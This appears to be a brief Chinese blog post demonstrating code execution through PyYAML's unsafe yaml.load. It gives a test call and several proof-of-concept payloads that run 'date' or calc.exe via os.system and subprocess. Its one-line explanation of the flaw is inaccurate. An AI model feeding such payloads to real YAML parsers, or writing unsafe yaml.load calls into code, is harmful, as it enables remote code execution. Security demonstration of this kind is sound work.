版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq1124794084/article/details/87270117
pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。
测试
import yaml
yaml.load('!!python/object/apply:os.system ["date"]')
结果
poc还可以
!!python/object/apply:subprocess.check_output [[calc.exe]]
!!python/object/apply:subprocess.check_output ["calc.exe"]
!!python/object/apply:subprocess.check_output [["calc.exe"]]
!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/new:os.system ["calc.exe"]